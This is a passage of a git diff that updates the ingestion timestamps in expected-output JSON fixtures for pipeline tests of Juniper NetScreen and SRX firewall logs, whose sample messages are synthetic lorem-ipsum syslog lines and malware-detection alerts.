eth3657 added", "event": { - "ingested": "2021-12-10T10:13:47.070340300Z" + "ingested": "2021-12-14T14:47:07.665162702Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "isis: NetScreen device_id=uasiar [utlab]system-high-00075(loremqu): The local device dantium in the Virtual Security Device group lor velillu", "event": { - "ingested": "2021-12-10T10:13:47.070349300Z" + "ingested": "2021-12-14T14:47:07.665163113Z" }, "ecs": { "version": "1.12.0" 
@@ -279,7 +279,7 @@ { "message": "bor: NetScreen device_id=rauto [ationev]system-low-00039(mdol): BGP instance name created for vr itation", "event": { - "ingested": "2021-12-10T10:13:47.070358700Z" + "ingested": "2021-12-14T14:47:07.665163620Z" }, "ecs": { "version": "1.12.0" @@ -291,7 +291,7 @@ { "message": "iaeco: NetScreen device_id=equaturv [siu]system-high-00262(veniamqu): Admin user rum has been rejected via the quaea server at 10.11.251.51", "event": { - "ingested": "2021-12-10T10:13:47.070367700Z" + "ingested": "2021-12-14T14:47:07.665164076Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "orroq: NetScreen device_id=vitaedic [orin]system-high-00038(ons): OSPF routing instance in vrouter remagn ecillu", "event": { - "ingested": "2021-12-10T10:13:47.070376600Z" + "ingested": "2021-12-14T14:47:07.665164474Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "enderit: NetScreen device_id=taut [tanimi]system-medium-00515(commodi): emporain Admin User \"ntiumto\" logged in for umetMalo(https) management (port 2206) from 10.80.237.27:2883", "event": { - "ingested": "2021-12-10T10:13:47.070385600Z" + "ingested": "2021-12-14T14:47:07.665164944Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "ori: NetScreen device_id=tconsect [rum]system-high-00073(eporroq): NSRP: Unit ulla of VSD group iqu oin", "event": { - "ingested": "2021-12-10T10:13:47.070469600Z" + "ingested": "2021-12-14T14:47:07.665165334Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "mipsum: NetScreen device_id=lmo [aliquamq]system-medium-00030: X509 certificate for ScreenOS image authentication is invalid", "event": { - "ingested": "2021-12-10T10:13:47.070478300Z" + "ingested": "2021-12-14T14:47:07.665165722Z" }, "ecs": { "version": "1.12.0" 
@@ -351,7 +351,7 @@ { "message": "orroqu: NetScreen device_id=elitsed [labore]system-medium-00034(erc): PPPoE Settings changed", "event": { - "ingested": "2021-12-10T10:13:47.070482800Z" + "ingested": "2021-12-14T14:47:07.665166099Z" }, "ecs": { "version": "1.12.0" @@ -363,7 +363,7 @@ { "message": "ntNe: NetScreen device_id=itanim [nesciun]system-medium-00612: Switch event: the status of ethernet port mollita changed to link down , duplex full , speed 10 M. (2017-4-2 01:27:07)", "event": { - "ingested": "2021-12-10T10:13:47.070487600Z" + "ingested": "2021-12-14T14:47:07.665166482Z" }, "ecs": { "version": "1.12.0" @@ -375,7 +375,7 @@ { "message": "quide: NetScreen device_id=quaU [undeomni]system-medium-00077(acomm): NSRP: local unit= iutali of VSD group itat stlaboru", "event": { - "ingested": "2021-12-10T10:13:47.070491600Z" + "ingested": "2021-12-14T14:47:07.665166885Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "emq: NetScreen device_id=plicaboN [amc]system-high-00536(acommo): IKE 10.10.77.119: Dropped packet because remote gateway OK is not used in any VPN tunnel configurations", "event": { - "ingested": "2021-12-10T10:13:47.070497900Z" + "ingested": "2021-12-14T14:47:07.665167343Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "scivel: NetScreen device_id=henderi [iusmodt]system-medium-00536(tquas): IKE 10.200.22.41: Received incorrect ID payload: IP address lorinr instead of IP address ercita", "event": { - "ingested": "2021-12-10T10:13:47.070505400Z" + "ingested": "2021-12-14T14:47:07.665167732Z" }, "ecs": { "version": "1.12.0" @@ -411,7 +411,7 @@ { "message": "equu: NetScreen device_id=sintoc [atae]system-medium-00203(tem): mestq lsa flood on interface eth82 has dropped a packet.", "event": { - "ingested": "2021-12-10T10:13:47.070513700Z" + "ingested": "2021-12-14T14:47:07.665168243Z" }, "ecs": { "version": "1.12.0" 
@@ -423,7 +423,7 @@ { "message": "iqui: NetScreen device_id=tesseci [tat]system-high-00011(cive): The virtual router nse has been made unsharable", "event": { - "ingested": "2021-12-10T10:13:47.070522700Z" + "ingested": "2021-12-14T14:47:07.665168625Z" }, "ecs": { "version": "1.12.0" @@ -435,7 +435,7 @@ { "message": "rroqui: NetScreen device_id=ursin [utemvel]system-medium-00002: ADMIN AUTH: Privilege requested for unknown user atu. Possible HA syncronization problem.", "event": { - "ingested": "2021-12-10T10:13:47.070532Z" + "ingested": "2021-12-14T14:47:07.665169003Z" }, "ecs": { "version": "1.12.0" @@ -447,7 +447,7 @@ { "message": "orumSe: NetScreen device_id=dolor [isiut]system-high-00206(emagn): OSPF instance with router-id emulla received a Hello packet flood from neighbor (IP address 10.219.1.151, router ID mnihilm) on Interface enp0s3375 forcing the interface to drop the packet.", "event": { - "ingested": "2021-12-10T10:13:47.070541100Z" + "ingested": "2021-12-14T14:47:07.665169501Z" }, "ecs": { "version": "1.12.0" @@ -459,7 +459,7 @@ { "message": "eque: NetScreen device_id=eufug [est]system-medium-00075: The local device ntincul in the Virtual Security Device group reet tquo", "event": { - "ingested": "2021-12-10T10:13:47.070550Z" + "ingested": "2021-12-14T14:47:07.665169888Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "imadmini: NetScreen device_id=ide [edq]system-medium-00026(tise): SSH: Attempt to unbind PKA key from admin user 'ntut' (Key ID emullam)", "event": { - "ingested": "2021-12-10T10:13:47.070558900Z" + "ingested": "2021-12-14T14:47:07.665170277Z" }, "ecs": { "version": "1.12.0" 
@@ -483,7 +483,7 @@ { "message": "ihilmole: NetScreen device_id=saquaea [ons]system-high-00048(quas): Route map entry with sequence number gia in route map binck-ospf in virtual router itatio was porinc (2017-8-22 23:52:50)", "event": { - "ingested": "2021-12-10T10:13:47.070567800Z" + "ingested": "2021-12-14T14:47:07.665170656Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "orum: NetScreen device_id=oinBCSed [orem]system-medium-00050(ilm): Track IP enabled (2017-9-6 06:55:24)", "event": { - "ingested": "2021-12-10T10:13:47.070576800Z" + "ingested": "2021-12-14T14:47:07.665171040Z" }, "ecs": { "version": "1.12.0" @@ -507,7 +507,7 @@ { "message": "ncididun: NetScreen device_id=hen [periamea]system-medium-00555: Vrouter ali PIMSM cannot process non-multicast address 10.158.18.51", "event": { - "ingested": "2021-12-10T10:13:47.070585800Z" + "ingested": "2021-12-14T14:47:07.665171419Z" }, "ecs": { "version": "1.12.0" @@ -519,7 +519,7 @@ { "message": "umwri: NetScreen device_id=odoc [atura]system-high-00030: SYSTEM CPU utilization is high (oreeu \u003e nvo ) iamqui times in tassita minute (2017-10-4 21:00:32)\u003c\u003ccolabori\u003e", "event": { - "ingested": "2021-12-10T10:13:47.070593200Z" + "ingested": "2021-12-14T14:47:07.665171920Z" }, "ecs": { "version": "1.12.0" @@ -531,7 +531,7 @@ { "message": "inc: NetScreen device_id=tect [uiad]system-low-00003: The console debug buffer has been roinBCSe", "event": { - "ingested": "2021-12-10T10:13:47.070597400Z" + "ingested": "2021-12-14T14:47:07.665172300Z" }, "ecs": { "version": "1.12.0" @@ -543,7 +543,7 @@ { "message": "nseq: NetScreen device_id=borumSec [tatemseq]system-medium-00026(dmi): SCS has been tam for eth7686 .", "event": { - "ingested": "2021-12-10T10:13:47.070603500Z" + "ingested": "2021-12-14T14:47:07.665172694Z" }, "ecs": { "version": "1.12.0" 
@@ -555,7 +555,7 @@ { "message": "uiineavo: NetScreen device_id=sistena [uidexeac]system-high-00620(amquisno): RTSYNC: Event posted to send all the DRP routes to backup device. (2017-11-16 18:08:15)", "event": { - "ingested": "2021-12-10T10:13:47.070610300Z" + "ingested": "2021-12-14T14:47:07.665173094Z" }, "ecs": { "version": "1.12.0" @@ -567,7 +567,7 @@ { "message": "sunt: NetScreen device_id=dquianon [urExc]system-high-00025(iamqui): PKI: The current device quide to save the certificate authority configuration.", "event": { - "ingested": "2021-12-10T10:13:47.070617700Z" + "ingested": "2021-12-14T14:47:07.665173519Z" }, "ecs": { "version": "1.12.0" @@ -579,7 +579,7 @@ { "message": "etdol: NetScreen device_id=Sed [oremeumf]system-high-00076: The local device etur in the Virtual Security Device group fugiatn enima", "event": { - "ingested": "2021-12-10T10:13:47.070626800Z" + "ingested": "2021-12-14T14:47:07.665173902Z" }, "ecs": { "version": "1.12.0" @@ -591,7 +591,7 @@ { "message": "giatquo: NetScreen device_id=lors [its]system-low-00524: SNMP request from an unknown SNMP community public at 10.46.217.155:76 has been received. (2017-12-29 15:15:58)", "event": { - "ingested": "2021-12-10T10:13:47.070635900Z" + "ingested": "2021-12-14T14:47:07.665174437Z" }, "ecs": { "version": "1.12.0" @@ -603,7 +603,7 @@ { "message": "magnaa: NetScreen device_id=sumquiad [No Name]system-high-00628: audit log queue Event Log is overwritten (2018-1-12 22:18:32)", "event": { - "ingested": "2021-12-10T10:13:47.070645200Z" + "ingested": "2021-12-14T14:47:07.665174976Z" }, "ecs": { "version": "1.12.0" @@ -615,7 +615,7 @@ { "message": "tnulapa: NetScreen device_id=madmi [No Name]system-high-00628(adeser): audit log queue Event Log is overwritten (2018-1-27 05:21:06)", "event": { - "ingested": "2021-12-10T10:13:47.070654500Z" + "ingested": "2021-12-14T14:47:07.665175369Z" }, "ecs": { "version": "1.12.0" 
@@ -627,7 +627,7 @@ { "message": "laboree: NetScreen device_id=udantiu [itametco]system-high-00556(stiaecon): UF-MGR: usBono CPA server port changed to rumexe.", "event": { - "ingested": "2021-12-10T10:13:47.070663500Z" + "ingested": "2021-12-14T14:47:07.665175759Z" }, "ecs": { "version": "1.12.0" @@ -639,7 +639,7 @@ { "message": "nturmag: NetScreen device_id=uredol [maliqua]system-medium-00058(mquia): PIMSM protocol configured on interface eth2266", "event": { - "ingested": "2021-12-10T10:13:47.070672600Z" + "ingested": "2021-12-14T14:47:07.665176149Z" }, "ecs": { "version": "1.12.0" @@ -651,7 +651,7 @@ { "message": "ueporroq: NetScreen device_id=ute [No Name]system-low-00625: Session (id tationu src-ip 10.142.21.251 dst-ip 10.154.16.147 dst port 6881) route is valid. (2018-3-11 02:28:49)", "event": { - "ingested": "2021-12-10T10:13:47.070681500Z" + "ingested": "2021-12-14T14:47:07.665176590Z" }, "ecs": { "version": "1.12.0" @@ -663,7 +663,7 @@ { "message": "adipi: NetScreen device_id=mquis [ratvo]system-low-00042(isno): Replay packet detected on IPSec tunnel on enp0s1170 with tunnel ID nderiti! From 10.105.212.51 to 10.119.53.68/1783, giatqu (2018-3-25 09:31:24)", "event": { - "ingested": "2021-12-10T10:13:47.070690400Z" + "ingested": "2021-12-14T14:47:07.665177004Z" }, "ecs": { "version": "1.12.0" @@ -675,7 +675,7 @@ { "message": "emvel: NetScreen device_id=pta [dolo]system-medium-00057(eacommod): uamqu: static multicast route src=10.174.2.175, grp=aparia input ifp = lo6813 output ifp = enp0s90 added", "event": { - "ingested": "2021-12-10T10:13:47.070699600Z" + "ingested": "2021-12-14T14:47:07.665177392Z" }, "ecs": { "version": "1.12.0" @@ -687,7 +687,7 @@ { "message": "giat: NetScreen device_id=ttenb [eirure]system-high-00549(rem): add-route-\u003e untrust-vr: exer", "event": { - "ingested": "2021-12-10T10:13:47.070708500Z" + "ingested": "2021-12-14T14:47:07.665177782Z" }, "ecs": { "version": "1.12.0" 
@@ -699,7 +699,7 @@ { "message": "lapari: NetScreen device_id=rcitat [cinge]system-high-00536(luptate): IKE gateway eritqu has been elites. pariat", "event": { - "ingested": "2021-12-10T10:13:47.070714900Z" + "ingested": "2021-12-14T14:47:07.665178198Z" }, "ecs": { "version": "1.12.0" @@ -711,7 +711,7 @@ { "message": "accus: NetScreen device_id=CSed [tiu]system-low-00049(upta): The router-id of virtual router \"asper\" used by OSPF, BGP routing instances id has been uninitialized. (dictasun)", "event": { - "ingested": "2021-12-10T10:13:47.070721600Z" + "ingested": "2021-12-14T14:47:07.665178590Z" }, "ecs": { "version": "1.12.0" @@ -723,7 +723,7 @@ { "message": "itanimi: NetScreen device_id=onoru [data]system-high-00064(eosqui): Can not create track-ip list", "event": { - "ingested": "2021-12-10T10:13:47.070737600Z" + "ingested": "2021-12-14T14:47:07.665178967Z" }, "ecs": { "version": "1.12.0" @@ -735,7 +735,7 @@ { "message": "int: NetScreen device_id=ionevo [llitani]system-high-00541(itametco): The system killed OSPF neighbor because the current router could not see itself in the hello packet. Neighbor changed state from etcons to etco state, (neighbor router-id 1iuntN, ip-address 10.89.179.48). (2018-6-19 03:46:49)", "event": { - "ingested": "2021-12-10T10:13:47.070743Z" + "ingested": "2021-12-14T14:47:07.665179364Z" }, "ecs": { "version": "1.12.0" @@ -747,7 +747,7 @@ { "message": "mmodicon: NetScreen device_id=eetdo [mquisno]system-low-00017(lup): mipsamv From 10.57.108.5:5523 using protocol icmp on interface enp0s4987. The attack occurred 2282 times", "event": { - "ingested": "2021-12-10T10:13:47.070748Z" + "ingested": "2021-12-14T14:47:07.665179742Z" }, "ecs": { "version": "1.12.0" 
@@ -759,7 +759,7 @@ { "message": "inimve: NetScreen device_id=aea [emipsumd]system-low-00263(ptat): Admin user saq has been accepted via the asiarch server at 10.197.10.110", "event": { - "ingested": "2021-12-10T10:13:47.070754700Z" + "ingested": "2021-12-14T14:47:07.665180132Z" }, "ecs": { "version": "1.12.0" @@ -771,7 +771,7 @@ { "message": "tlab: NetScreen device_id=vel [ionevo]system-high-00622: NHRP : NHRP instance in virtual router ptate is created. (2018-8-1 00:54:32)", "event": { - "ingested": "2021-12-10T10:13:47.070764700Z" + "ingested": "2021-12-14T14:47:07.665180515Z" }, "ecs": { "version": "1.12.0" @@ -783,7 +783,7 @@ { "message": "qui: NetScreen device_id=caboN [imipsam]system-high-00528(catcupid): SSH: Admin user 'ritquiin' at host 10.59.51.171 requested unsupported authentication method texplica", "event": { - "ingested": "2021-12-10T10:13:47.070770800Z" + "ingested": "2021-12-14T14:47:07.665181045Z" }, "ecs": { "version": "1.12.0" @@ -795,7 +795,7 @@ { "message": "udexerci: NetScreen device_id=uae [imveni]system-medium-00071(ptatemse): NSRP: Unit itationu of VSD group setquas nbyCi", "event": { - "ingested": "2021-12-10T10:13:47.070777700Z" + "ingested": "2021-12-14T14:47:07.665181498Z" }, "ecs": { "version": "1.12.0" @@ -807,7 +807,7 @@ { "message": "isno: NetScreen device_id=luptatev [occaeca]system-high-00018(urau): aeca Policy (oNem, itaedict ) was eroi from host 10.80.103.229 by admin fugitsed (2018-9-12 22:02:15)", "event": { - "ingested": "2021-12-10T10:13:47.070790200Z" + "ingested": "2021-12-14T14:47:07.665181907Z" }, "ecs": { "version": "1.12.0" @@ -819,7 +819,7 @@ { "message": "utlabore: NetScreen device_id=edquiano [mSecti]system-high-00207(tDuisaut): RIP database size limit exceeded for uel, RIP route dropped.", "event": { - "ingested": "2021-12-10T10:13:47.070797800Z" + "ingested": "2021-12-14T14:47:07.665182299Z" }, "ecs": { "version": "1.12.0" 
@@ -831,7 +831,7 @@ { "message": "agn: NetScreen device_id=iqu [quamqua]system-high-00075: NSRP: Unit equeporr of VSD group amremap oremagna", "event": { - "ingested": "2021-12-10T10:13:47.070803100Z" + "ingested": "2021-12-14T14:47:07.665182694Z" }, "ecs": { "version": "1.12.0" @@ -843,7 +843,7 @@ { "message": "ntium: NetScreen device_id=ide [quunturm]system-low-00040(isautem): High watermark for early aging has been changed to the default usan", "event": { - "ingested": "2021-12-10T10:13:47.070807500Z" + "ingested": "2021-12-14T14:47:07.665183076Z" }, "ecs": { "version": "1.12.0" @@ -855,7 +855,7 @@ { "message": "catcu: NetScreen device_id=quame [tionemu]system-low-00524(eursi): SNMP host 10.163.9.35 cannot be removed from community uatDu because failure", "event": { - "ingested": "2021-12-10T10:13:47.070812Z" + "ingested": "2021-12-14T14:47:07.665183468Z" }, "ecs": { "version": "1.12.0" @@ -867,7 +867,7 @@ { "message": "cteturad: NetScreen device_id=modi [No Name]system-low-00625(ecatcu): Session (id ntoccae src-ip 10.51.161.245 dst-ip 10.193.80.21 dst port 5657) route is valid. (2018-11-23 09:15:06)", "event": { - "ingested": "2021-12-10T10:13:47.070815900Z" + "ingested": "2021-12-14T14:47:07.665183855Z" }, "ecs": { "version": "1.12.0" @@ -879,7 +879,7 @@ { "message": "chit: NetScreen device_id=iusmodit [lor]system-high-00524(adeserun): SNMP request has been received, but success", "event": { - "ingested": "2021-12-10T10:13:47.070822Z" + "ingested": "2021-12-14T14:47:07.665184244Z" }, "ecs": { "version": "1.12.0" @@ -891,7 +891,7 @@ { "message": "vento: NetScreen device_id=litsed [ciun]system-medium-00072: The local device inrepr in the Virtual Security Device group lla changed state", "event": { - "ingested": "2021-12-10T10:13:47.070827500Z" + "ingested": "2021-12-14T14:47:07.665184774Z" }, "ecs": { "version": "1.12.0" 
@@ -903,7 +903,7 @@ { "message": "rissusci: NetScreen device_id=uaturQ [iusmod]system-medium-00533(mips): VIP server 10.41.222.7 is now responding", "event": { - "ingested": "2021-12-10T10:13:47.070835Z" + "ingested": "2021-12-14T14:47:07.665185174Z" }, "ecs": { "version": "1.12.0" @@ -915,7 +915,7 @@ { "message": "upta: NetScreen device_id=ivel [tmollita]system-low-00070(deFinib): NSRP: nsrp control channel change to lo4065", "event": { - "ingested": "2021-12-10T10:13:47.070843900Z" + "ingested": "2021-12-14T14:47:07.665185661Z" }, "ecs": { "version": "1.12.0" @@ -927,7 +927,7 @@ { "message": "ommodic: NetScreen device_id=mmodic [essequam]system-low-00040(nihi): VPN 'xeaco' from 10.134.20.213 is eavolupt (2019-2-2 20:27:57)", "event": { - "ingested": "2021-12-10T10:13:47.070852700Z" + "ingested": "2021-12-14T14:47:07.665186091Z" }, "ecs": { "version": "1.12.0" @@ -939,7 +939,7 @@ { "message": "ptasnul: NetScreen device_id=utaliqui [mcorpor]system-medium-00023(ostru): VIP/load balance server 10.110.144.189 cannot be contacted", "event": { - "ingested": "2021-12-10T10:13:47.070861500Z" + "ingested": "2021-12-14T14:47:07.665186515Z" }, "ecs": { "version": "1.12.0" @@ -951,7 +951,7 @@ { "message": "luptatem: NetScreen device_id=ing [hen]system-medium-00034(umquid): SCS: SCS has been olabo for tasnu with conse existing PKA keys already bound to ruredolo SSH users.", "event": { - "ingested": "2021-12-10T10:13:47.070870200Z" + "ingested": "2021-12-14T14:47:07.665186907Z" }, "ecs": { "version": "1.12.0" @@ -963,7 +963,7 @@ { "message": "iat: NetScreen device_id=orain [equaturQ]system-low-00554: SCAN-MGR: Attempted to load AV pattern file created quia after the AV subscription expired. (Exp: Exce)", "event": { - "ingested": "2021-12-10T10:13:47.070878900Z" + "ingested": "2021-12-14T14:47:07.665187296Z" }, "ecs": { "version": "1.12.0" 
@@ -975,7 +975,7 @@ { "message": "dese: NetScreen device_id=ptasn [liqui]system-low-00541: ScreenOS invol serial # Loremips: Asset recovery has been cidun", "event": { - "ingested": "2021-12-10T10:13:47.070887700Z" + "ingested": "2021-12-14T14:47:07.665187688Z" }, "ecs": { "version": "1.12.0" @@ -987,7 +987,7 @@ { "message": "ole: NetScreen device_id=odi [tper]system-medium-00628(ectetur): audit log queue Event Log is overwritten (2019-4-15 07:40:49)", "event": { - "ingested": "2021-12-10T10:13:47.070896400Z" + "ingested": "2021-12-14T14:47:07.665188069Z" }, "ecs": { "version": "1.12.0" @@ -999,7 +999,7 @@ { "message": "iadolo: NetScreen device_id=ecatcup [No Name]system-high-00628: audit log queue Traffic Log is overwritten (2019-4-29 14:43:23)", "event": { - "ingested": "2021-12-10T10:13:47.070905300Z" + "ingested": "2021-12-14T14:47:07.665188457Z" }, "ecs": { "version": "1.12.0" @@ -1011,7 +1011,7 @@ { "message": "qui: NetScreen device_id=iaecon [dminima]system-high-00538(psaquaea): NACN failed to register to Policy Manager eabillo because of success", "event": { - "ingested": "2021-12-10T10:13:47.070914100Z" + "ingested": "2021-12-14T14:47:07.665188882Z" }, "ecs": { "version": "1.12.0" @@ -1023,7 +1023,7 @@ { "message": "eosqu: NetScreen device_id=reetdolo [umquam]system-low-00075(enderi): The local device labore in the Virtual Security Device group uasiarch changed state from iamquisn to inoperable. (2019-5-28 04:48:31)", "event": { - "ingested": "2021-12-10T10:13:47.070923100Z" + "ingested": "2021-12-14T14:47:07.665190273Z" }, "ecs": { "version": "1.12.0" @@ -1035,7 +1035,7 @@ { "message": "veleumi: NetScreen device_id=volupt [equ]system-high-00535(ure): SCEP_FAILURE message has been received from the CA", "event": { - "ingested": "2021-12-10T10:13:47.070931200Z" + "ingested": "2021-12-14T14:47:07.665190723Z" }, "ecs": { "version": "1.12.0" 
@@ -1047,7 +1047,7 @@ { "message": "reseo: NetScreen device_id=entoreve [rudexer]system-medium-00026(iruredol): IKE iad: Missing heartbeats have exceeded the threshold. All Phase 1 and 2 SAs have been removed", "event": { - "ingested": "2021-12-10T10:13:47.070936800Z" + "ingested": "2021-12-14T14:47:07.665191124Z" }, "ecs": { "version": "1.12.0" @@ -1059,7 +1059,7 @@ { "message": "ptate: NetScreen device_id=oloreeu [imipsa]system-high-00038: OSPF routing instance in vrouter uame taevitae", "event": { - "ingested": "2021-12-10T10:13:47.070942900Z" + "ingested": "2021-12-14T14:47:07.665191525Z" }, "ecs": { "version": "1.12.0" @@ -1071,7 +1071,7 @@ { "message": "archi: NetScreen device_id=caboNe [ptate]system-high-00003(ius): Multiple authentication failures have been detected!", "event": { - "ingested": "2021-12-10T10:13:47.070952Z" + "ingested": "2021-12-14T14:47:07.665191910Z" }, "ecs": { "version": "1.12.0" @@ -1083,7 +1083,7 @@ { "message": "remap: NetScreen device_id=ntium [veniamqu]system-high-00529: DNS entries have been refreshed by HA", "event": { - "ingested": "2021-12-10T10:13:47.070960900Z" + "ingested": "2021-12-14T14:47:07.665192360Z" }, "ecs": { "version": "1.12.0" @@ -1095,7 +1095,7 @@ { "message": "llumdo: NetScreen device_id=tot [itquii]system-high-00625(erspici): Session (id oreeu src-ip 10.126.150.15 dst-ip 10.185.50.112 dst port 7180) route is invalid. (2019-8-21 23:03:57)", "event": { - "ingested": "2021-12-10T10:13:47.070969800Z" + "ingested": "2021-12-14T14:47:07.665192749Z" }, "ecs": { "version": "1.12.0" @@ -1107,7 +1107,7 @@ { "message": "quepo: NetScreen device_id=tDuisa [iscive]system-medium-00521: Can't connect to E-mail server 10.152.90.59", "event": { - "ingested": "2021-12-10T10:13:47.070978700Z" + "ingested": "2021-12-14T14:47:07.665193129Z" }, "ecs": { "version": "1.12.0" 
@@ -1119,7 +1119,7 @@ { "message": "lorem: NetScreen device_id=icons [hende]system-low-00077(usBonor): HA link disconnect. Begin to use second path of HA", "event": { - "ingested": "2021-12-10T10:13:47.070985400Z" + "ingested": "2021-12-14T14:47:07.665193510Z" }, "ecs": { "version": "1.12.0" @@ -1131,7 +1131,7 @@ { "message": "preh: NetScreen device_id=dol [No Name]system-low-00625: Session (id gnamal src-ip 10.119.181.171 dst-ip 10.166.144.66 dst port 3051) route is invalid. (2019-10-3 20:11:40)", "event": { - "ingested": "2021-12-10T10:13:47.070991600Z" + "ingested": "2021-12-14T14:47:07.665193903Z" }, "ecs": { "version": "1.12.0" @@ -1143,7 +1143,7 @@ { "message": "avolup: NetScreen device_id=litse [archit]system-high-00041(untutlab): A route-map name in virtual router estqu has been removed", "event": { - "ingested": "2021-12-10T10:13:47.071000600Z" + "ingested": "2021-12-14T14:47:07.665194296Z" }, "ecs": { "version": "1.12.0" @@ -1155,7 +1155,7 @@ { "message": "eddoeiu: NetScreen device_id=consect [eetdolo]system-medium-00038(remipsum): OSPF routing instance in vrouter ons emporin", "event": { - "ingested": "2021-12-10T10:13:47.071009500Z" + "ingested": "2021-12-14T14:47:07.665194889Z" }, "ecs": { "version": "1.12.0" @@ -1167,7 +1167,7 @@ { "message": "texpl: NetScreen device_id=isquames [No Name]system-low-00021: DIP port-translation stickiness was atio by utla via ntm from host 10.96.165.147 to 10.96.218.99:277 (2019-11-15 17:19:22)", "event": { - "ingested": "2021-12-10T10:13:47.071018300Z" + "ingested": "2021-12-14T14:47:07.665195276Z" }, "ecs": { "version": "1.12.0" @@ -1179,7 +1179,7 @@ { "message": "elaudant: NetScreen device_id=ratvolu [odte]system-medium-00021(eum): DIP port-translation stickiness was uidol by repr via idu from host 10.201.72.59 to 10.230.29.67:7478 (2019-11-30 00:21:57)", "event": { - "ingested": "2021-12-10T10:13:47.071027200Z" + "ingested": "2021-12-14T14:47:07.665195659Z" }, "ecs": { "version": "1.12.0" 
@@ -1191,7 +1191,7 @@ { "message": "toc: NetScreen device_id=rau [sciuntN]system-low-00602: PIMSM Error in initializing interface state change", "event": { - "ingested": "2021-12-10T10:13:47.071035800Z" + "ingested": "2021-12-14T14:47:07.665196044Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json index 85bf03ddb14..777f3fb7c80 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json @@ -86,7 +86,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:49.798358700Z", + "ingested": "2021-12-14T14:47:10.183090634Z", "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", "kind": "alert", "action": "malware_detected", @@ -147,7 +147,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:49.798372100Z", + "ingested": "2021-12-14T14:47:10.183094173Z", "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.168.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", "kind": "alert", "action": "malware_detected", 
@@ -208,7 +208,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:13:49.798377Z", + "ingested": "2021-12-14T14:47:10.183094689Z", "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.168.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", "kind": "alert", "category": [ @@ -308,7 +308,7 @@ }, "event": { "severity": 165, - "ingested": "2021-12-10T10:13:49.798383500Z", + "ingested": "2021-12-14T14:47:10.183095105Z", "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"67.43.156.15\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]", "kind": "event", "category": [ diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json index 0372dd350ea..b0d8688a8b9 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json 
